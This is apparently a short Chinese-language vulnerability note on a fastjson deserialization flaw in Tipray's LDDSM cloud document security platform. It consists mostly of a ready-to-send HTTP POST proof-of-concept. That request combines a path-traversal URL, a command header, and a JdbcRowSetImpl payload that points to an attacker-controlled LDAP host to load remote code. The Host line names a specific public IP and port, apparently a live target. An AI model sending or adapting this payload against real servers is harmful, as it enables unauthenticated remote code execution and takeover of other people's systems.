漏洞描述
厦门天锐科技股份有限公司天锐绿盘云文档安全管理平台存在fastjson反序列化漏洞,未经授权的攻击者可通过该漏洞获取服务器权限。
厦门天锐科技股份有限公司天锐绿盘云文档安全管理平台存在fastjson反序列化漏洞
PoC代码
POST /lddsm/service/../ldfbsnodeDocumentController/restorMachineToClient.do HTTP/1.1
Host: 183.242.32.10:8180
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept-Encoding: gzip, deflate
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
cmd: dir
diskMatch={"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://vpsip:1389/TomcatBypass/TomcatEcho","autoCommit":true}}&sourceUmId=1&destUmId=1